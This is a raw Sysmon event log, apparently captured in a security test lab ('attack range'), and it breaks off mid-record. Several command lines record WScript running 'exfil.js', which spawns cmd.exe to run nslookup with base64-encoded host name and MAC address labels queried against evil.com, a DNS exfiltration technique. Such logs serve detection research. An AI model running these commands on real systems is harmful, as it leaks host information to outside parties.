14:21:48.134{2E1864BB-18FC-629A-E845-000000005F02}72885992C:\Windows\system32\cmd.exe{2E1864BB-18FC-629A-EA45-000000005F02}6680C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000214502Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.141{2E1864BB-18FC-629A-EA45-000000005F02}6680C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A RE5TSG9zdE5hbWU6IHdpbi1kYy1jdC1hdHRhY2stcmFuZ2UtMzA0 evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18FC-629A-E845-000000005F02}7288C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A RE5TSG9zdE5hbWU6IHdpbi1kYy1jdC1hdHRhY2stcmFuZ2UtMzA0 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlsavun.tmp 2>&1 10341000x8000000000000000214501Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.119{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18FC-629A-E945-000000005F02}3552C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214500Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.119{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18FC-629A-E945-000000005F02}3552C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214499Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.103{2E1864BB-18FC-629A-E945-000000005F02}35524848C:\Windows\system32\conhost.exe{2E1864BB-18FC-629A-E845-000000005F02}7288C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214498Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.103{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18FC-629A-E945-000000005F02}3552C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000214497Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.102{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214496Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.102{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214495Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.102{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214494Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.102{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214493Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.102{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18FC-629A-E845-000000005F02}7288C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000214492Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.101{2E1864BB-18E0-629A-6742-000000005F02}39761696C:\Windows\System32\WScript.exe{2E1864BB-18FC-629A-E845-000000005F02}7288C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000214491Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.101{2E1864BB-18FC-629A-E845-000000005F02}7288C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A RE5TSG9zdE5hbWU6IHdpbi1kYy1jdC1hdHRhY2stcmFuZ2UtMzA0 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlsavun.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000214490Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.081{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlrentl.tmpMD5=B16E2386D2E39F09BDE969D627970342,SHA256=797A98F63D6E57D0F6A3377DF2DF1B9F1EDDED7E98D9A5F6DC7382913541E075,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000214489Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.066{2E1864BB-18FC-629A-E645-000000005F02}72006716C:\Windows\system32\conhost.exe{2E1864BB-18FC-629A-E745-000000005F02}5552C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214488Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.066{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214487Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.066{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214486Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.066{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214485Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.066{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214484Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.066{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18FC-629A-E745-000000005F02}5552C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000214483Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.066{2E1864BB-18FC-629A-E545-000000005F02}48167044C:\Windows\system32\cmd.exe{2E1864BB-18FC-629A-E745-000000005F02}5552C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000214482Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.069{2E1864BB-18FC-629A-E745-000000005F02}5552C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A TUFDQWRkcmVzczogMDI6RjA6NEI6MUU6QUM6Q0E= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18FC-629A-E545-000000005F02}4816C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A TUFDQWRkcmVzczogMDI6RjA6NEI6MUU6QUM6Q0E= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlrentl.tmp 2>&1 10341000x8000000000000000214481Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.035{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18FC-629A-E645-000000005F02}7200C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214480Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.035{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18FC-629A-E645-000000005F02}7200C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214479Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.035{2E1864BB-18FC-629A-E645-000000005F02}72006716C:\Windows\system32\conhost.exe{2E1864BB-18FC-629A-E545-000000005F02}4816C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214478Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.019{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18FC-629A-E645-000000005F02}7200C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000214477Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.003{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214476Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.003{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214475Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.003{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214474Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.003{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214473Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.003{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18FC-629A-E545-000000005F02}4816C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000214472Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.003{2E1864BB-18E0-629A-6742-000000005F02}39765544C:\Windows\System32\WScript.exe{2E1864BB-18FC-629A-E545-000000005F02}4816C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\